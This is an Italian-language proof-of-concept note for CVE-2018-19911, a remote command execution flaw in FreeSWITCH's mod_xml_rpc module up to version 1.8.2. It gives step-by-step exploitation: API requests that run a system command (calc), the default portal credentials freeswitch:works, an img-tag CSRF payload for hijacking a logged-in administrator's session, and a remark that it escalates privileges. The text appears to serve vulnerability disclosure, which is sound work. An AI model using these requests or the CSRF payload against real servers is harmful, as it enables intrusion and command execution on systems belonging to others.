
FreeSWITCH: esecuzione remota di comandi in tutte le versioni (cve-2018-19911)
version:<=1.8.2
module:mod_xml_rpc
Ho testato un totale di tre versioni.(url di download:http://files.freeswitch.org/)
Installa freeswitch 1.5.15 versione Windows(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
Apri la console e digita: load mod_xml_rpc (carica il portale freeswitch)
Accedi alla porta locale 8080,
http://127.0.0.1:8080/portal/index.html
Inserisci nella console
api("system calc")oapi("bg_system calc")

Puoi anche richiedere direttamente l'interfaccia
http://127.0.0.1:8080/txtapi/system?calc oppure
http://127.0.0.1:8080/api/system?calc



L'account e la password predefiniti per il portale freeswitch sono freeswitch:works
Puoi verificarlo tu stesso usandofreeswitch_rce.py
Oppure usa il csrf per attaccare l'amministratore con sessione attiva.
<img src="http://127.0.0.1:8080/api/system?calc">

Poiché freeswitch spesso viene eseguito con privilegi elevati, può anche ottenere l'effetto di escalation dei privilegi